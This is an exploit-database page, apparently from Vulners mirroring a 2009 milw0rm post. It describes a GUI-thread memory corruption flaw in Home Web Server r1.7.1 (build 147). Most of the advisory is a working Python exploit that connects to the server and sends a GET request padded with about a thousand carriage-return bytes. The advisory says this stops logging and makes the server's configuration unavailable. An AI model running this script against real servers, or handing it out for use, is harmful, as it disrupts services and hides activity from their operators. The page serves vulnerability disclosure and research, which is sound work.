Lucene search
K

Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruptio

Code

                                                  Home Web Server &#60;=r1.7.1 (build 147) &#34;Gui Thread-Memory Corruption Exploit.&#34; By: Aodrulez.

Homepage         : http://downstairs.dnsalias.net/homewebserver.html 
Product Released : 22.4.2009/21:16:58
 

Description:
	This web server when fed with 
1006 bytes of chr(0x0d),with the html
&#34;GET&#34; parameter,the Server&#39;s Gui&#39;s 
Thread gets corrupted.This means,
though the web server works normally,
(due to Multithreading),No more Logs 
are generated.Also &#34;all&#34; the web server 
configuration settings are unavailable.


	
Exploit (Python):
----------------------------------------------------------
# Echo client program
import socket

HOST = &#39;localhost&#39;    # The remote host
pORT = 80           # The same port as used by the server
print &#39;####################################&#39;
print &#39;#Home Web Server r1.7.1 (build 147)#&#39;
print &#39;#  Gui Thread Corruption Exploit   #&#39;
print &#39;#                                  #&#39;
print &#39;#          By: Aodrulez            #&#39;
print &#39;#       [email protected]       #&#39;
print &#39;#                                  #&#39;
print &#39;####################################&#39;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, pORT))
p=&#39;GET &#39;+chr(0x0d)*1001+&#39;index.html HTTp/1.0\r\n\r\n&#39;
s.send(p)
s.close()
print &#39;\&#34;&#39;+HOST+&#39;\&#39;s Gui Got Corrupted :P\&#34;     &#39;
---------------------------------------------------------

Greetz Fly out to:
1] Amforked()      : My Mentor.
2] The Blue Genius : :-)
3] www.OrchidSeven.com

# milw0rm.com [2009-04-23]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation